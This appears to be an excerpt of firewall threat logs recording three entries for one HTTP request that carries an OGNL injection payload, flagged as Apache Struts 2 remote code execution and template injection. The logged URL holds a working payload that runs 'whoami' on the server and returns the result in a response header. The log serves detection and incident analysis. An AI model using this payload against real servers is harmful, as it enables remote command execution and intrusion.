Jun  3 21:12:42 b-fw-01.example.com 1,2022/06/03 21:12:42,016201013330,THREAT,vulnerability,2305,2022/06/03 21:12:42,12.9.5.1,40.10.60.2,12.9.5.1,40.10.60.2,service-globalprotect,,,web-browsing,vsys1,UNTRUST,UNTRUST,ethernet1/20,loopback.2,example_Zero,2022/06/03 21:12:42,846194,1,50166,443,50166,20077,0x81402000,tcp,alert,"b-gw1.example.com/index.action/..;aaaa'/${(#a=@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec(""whoami"").getInputStream(),""utf-8"")).(@com.opensymphony.webwork.ServletActionContext@getResponse().setHeader(""X-Cmd-Response"",#a))}/index.action",Apache Struts 2 Remote Code Execution Vulnerability(33948),allow--URL,high,client-to-server,327662911,0xa000000000000000,Canada,United States,0,,1208167088882157611,,,1,,,,,,,,0,177,204,178,197,,b1-fw-01,,,,,0,,0,,N/A,code-execution,AppThreat-8575-7413,0x4,0,4294967295,,,be9fa539-d3c1-22f2-b1cb-ae2c91523e4f,0,
Jun  3 21:12:42 b-fw-01.example.com 1,2022/06/03 21:12:42,016201013330,THREAT,vulnerability,2305,2022/06/03 21:12:42,12.9.5.1,40.10.60.2,12.9.5.1,40.10.60.2,service-globalprotect,,,web-browsing,vsys1,UNTRUST,UNTRUST,ethernet1/20,loopback.2,example_Zero,2022/06/03 21:12:42,846194,1,50166,443,50166,20077,0x81402000,tcp,alert,"b-gw1.example.com/index.action/..;aaaa'/${(#a=@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec(""whoami"").getInputStream(),""utf-8"")).(@com.opensymphony.webwork.ServletActionContext@getResponse().setHeader(""X-Cmd-Response"",#a))}/index.action",HTTP Server Side Template Injection Attempt(92196),allow--URL,medium,client-to-server,327662910,0xa000000000000000,Canada,United States,0,,1208167088882157610,,,1,,,,,,,,0,177,204,178,197,,b1-fw-01,,,,,0,,0,,N/A,code-execution,AppThreat-8575-7413,0x0,0,4294967295,,,be9fa539-d3c1-22f2-b1cb-ae2c91523e4f,0,
Jun  3 21:12:42 b-fw-01.example.com 1,2022/06/03 21:12:42,016201013330,THREAT,url,2305,2022/06/03 21:12:42,12.9.5.1,40.10.60.2,12.9.5.1,40.10.60.2,service-globalprotect,,,web-browsing,vsys1,UNTRUST,UNTRUST,ethernet1/20,loopback.2,example_Zero,2022/06/03 21:12:42,846194,1,50166,443,50166,20077,0x1403000,tcp,allow,"b-gw1.example.com/index.action/..;aaaa'/${(#a=@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec(""whoami"").getInputStream(),""utf-8"")).(@com.opensymphony.webwork.ServletActionContext@getResponse().setHeader(""X-Cmd-Response"",#a))}/index.action",(9999),allow--URL,informational,client-to-server,327662909,0xa000000000000000,Canada,United States,0,,0,,,1,Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0,,,,,,,0,177,204,178,197,,b1-fw-01,,,,get,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,," allow--URL,computer-and-internet-info,low-risk",be9fa539-d3c1-22f2-b1cb-ae2c91523e4f,0,